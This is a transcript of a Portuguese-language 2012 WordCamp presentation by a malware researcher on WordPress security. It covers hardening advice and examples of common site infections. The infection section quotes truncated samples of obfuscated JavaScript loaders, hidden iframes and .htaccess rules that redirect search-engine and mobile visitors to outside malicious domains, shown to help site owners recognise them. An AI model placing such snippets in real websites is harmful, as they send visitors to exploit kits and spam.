Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

Wordcamp SP 2012

Malware e Segurança em Wordpress
by

B B

on 27 April 2014

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Wordcamp SP 2012

photo credit Nasa / Goddard Space Flight Center / Reto Stöckli
Malware e Segurança
root@bt:~# whoami
Analista de Segurança
Pesquisador de Malware
CompTIA Security+
Information Security on ISO 27002
WP Fã
Fazia sites em html com java applets
Hospedava no HpG
Não uso facebook :)
Lembro meu #UIN do ICQ
Bruno Borges
@brunoborgessec
sucuri.net

Até que um belo dia...
Aviso: Alguma coisa não está certa aqui!
Mas eu sou gente boa,

Porque fizeram isso comigo? :(
Mas eu escrevo apenas sobre o Bob Esponja. Por que hackearam justo o meu site?
Basta que se tenha um site,
para que ele possa ser infectado.




Isso não vai acontecer comigo...
Será?...
SE ALGO PUDER DAR ERRADO,


DARÁ ERRADO NO PIOR MOMENTO POSSÍVEL !!!


(Lei de Murphy)
Verificar se e como
o site está infectado
sitecheck.sucuri.net
Verificar com o que está infectado:
sitecheck.sucuri.net

Mais informações sobre a infecção no webmaster tools do google:
www.google.com.br/webmasters/tools

Pedir ajuda para detecção e limpeza:
badwarebusters.org/conversations
WP, plugins e temas desatualizados
Senha de FTP fracas, foram quebradas ou roubadas da sua máquina local.
Problemas e vulnerabilidades na sua companhia de Hosting.
Exploits 0Day
Como fui
h4Ck34d0
?
O que é
Malware
?
Abreviatura de Malicious Software.
Um software que é criado para interromper
a operação de um computador,
coletar informações sensíveis
ou obter acesso não-autorizado
à sistemas computacionais.
O que é
Malware
?
Abreviatura de Malicious Software.
Um software que é criado para interromper
a operação de um computador,
coletar informações sensíveis
ou obter acesso não-autorizado
à sistemas computacionais.
Reduzindo riscos de infecção/hacking
Pelo menos 15-20 caracteres
MAIUSCULO e minusculo
c@r4ct3R3$ 3$p3c!4!$ & nUm3r0$ !!**

Se preferir use um Password Wallet
Ex: Lastpass.com OR 1Password

#Mais importante:

Não apenas saber, mas fazer o que está escrito!
Credenciais Fortes
Usar AV em todas as máquinas que você loga no seu site
Independente de plataforma (Windows, Linux, Mac, Android, iOS).
Atualize seu Sistema Operacional, Browser, Java, Flash, Adobe, etc...
Hoje existem malwares que carregam payloads diferentes de acordo com seu S.O., browser e plugins instalados.
Cuidados com sua máquina pessoal
O mais barato não é sempre o melhor
Analise como seu hosting lida com questões de segurança.
Sempre confira se eles usam versões atualizadas dos sistemas operacionais e aplicativos de gerenciamento.
Verifique se backup e outros serviços de segurança fazem parte do seu plano ou são adicionais pagos.
Se você usa Plesk, verifique se possui a versão mais atual. Mais informações:
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
Reputação da sua empresa de Hosting
Remova do servidor temas e plugins que não estejam em uso

Busque atualizações

Verifique se os itens vem de fontes confiáveis

Não busque temas grátis no google

Tenha dupla precaução ao usar temas gratuitos da internet

Atualize o Timthumb do tema (2.8.10):
http://timthumb.googlecode.com/svn/trunk/timthumb.php
Use apenas temas e plugins necessários
Não use conta com o nome
admin
Pastas => 755

Arquivos => 644

wp-config => 600

.htaccess => 644
Permissões recomendadas
Pesquise... estude..
Se
Tudo
Der
Certo
@brunoborgessec
Contatos:
bruno@sucuri.net
sucuri.net
blog.sucuri.net
sitecheck.sucuri.net
/*c3284d*/
alert ('
PRINCIPAIS INFECÇÕES ATUAIS'
);
/*/c3284d*/
Permite que um atacante remoto comprometa um servidor Plesk

Versões afetadas pela vulnerabilidade:

Plesk for Linux / Windows 7.x
Plesk for Linux / Windows 8.x
Plesk for Linux / Windows 9.x
Plesk for Linux / Windows 10.0 - 10.3.1

Versão não afetada: 11 (mais atual)
http://kb.parallels.com/en/113321
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
Remote vulnerability in Plesk Panel
(CVE-2012-1557)
Linguagem que pode ser executada diretamente pelo browser e outras aplicações.

Malware em javascript permite que atacantes rodem códigos maliciosos à partir de sites comprometidos

Podem redirecionar usuários para spam, exploit kits, fake AV, etc.
# Encoded Javascript #
<script type="text/javascript" src="http://rec-creations.com/player.js"..
s = String[c+'r'+"omChar"+'C'+'o'+"d'+'e'] (70, 81,69,87 ,79,71,80,86,16,89,84,75,86, 71,10,9,30,69,71,80,86,71,84,32,30,74,19,32,50
var _0x4470=["\x39\ x3D\x31\x2E\x64\ x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39..
Usado para inserir conteúdo externo, dentro de uma página HTML.

Atacantes utilizam para inserir conteúdo malicioso de outras páginas comprometidas.
@ Malicious iframes @
<iframe src="http://rec-creations.com/adv.php" height="2" width="2"..

<script type="text/javascript">document.write("<iframe src="http://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2..
Geralmente infectam o arquivo .htaccess para direcionar determinados browsers para sites infectados.

Usuários que chegam de search engines são redirecionados para outros sites.
* Conditional Redirection *
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol||abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://24register.ru/mishor?7 [R=301,L]
</IfModule>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteRule ^(.*)$ http://wap-opera.com/in.cgi?a [L,R=302]
* Conditional Redirection - Mobile *
Vulnerabilidade sendo explorada há pouco mais de 1 ano

Permite o upload de webshells em PHP

Habilita o acesso remoto ao servidor infectado

Ainda hoje existem sites sendo explorados e que estejam hospedando shells
#
Timthumb Vulnerability
#
Se você usa um servidor compartilhado...
Mass Infection & Website cross-contamination
Geralmente utilizado para inserir links para o site do atacante de forma a gerar tráfego e aumentar a pagerank nos mecanismos de busca.
=
Blackhat SEO Spam
=
Tenta explorar o browser do visitante do site utilizando uma combinação de múltiplas vulnerabilidades (Java, Adobe PDF, Flash e outras).

Arquivos PHP, JS, .htaccess podem ser infectados.
*/
Blackhole Exploit Kit
/*
CRÉDITOS:

blog.sucuri.net labs.sucuri.net
e todos os seus respectivos autores.
Afeta versões desatualizadas de WP, Joomla, entre outros.
Backup existe para ser feito
http://ithemes.com/purchase/backupbuddy/
E os plugins facilitam...
Defacement
Full transcript